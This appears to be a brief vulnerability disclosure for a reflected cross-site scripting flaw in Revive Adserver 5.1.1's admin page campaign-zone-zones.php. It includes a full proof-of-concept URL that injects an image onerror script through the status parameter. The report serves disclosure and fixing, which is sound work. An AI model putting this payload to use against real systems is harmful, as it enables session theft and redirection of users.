I found a reflected XSS attack on /admin/campaign-zone-zones.php
.
Revive-Adserver version is revive-adserver-5.1.1
.
Go to http://revive-adserver.loc/admin/campaign-zone-zones.php?_=&clientid=1&campaignid=1&status=available%22%3E%3Cimg%20src=1%20onerror=alert(document.domain)%3E&text=
Malicious code executed
{F1187355}
Rendered response from server:
{F1187356}
With this vulnerability, an attacker can for example steal users cookies or redirect users on malicious website.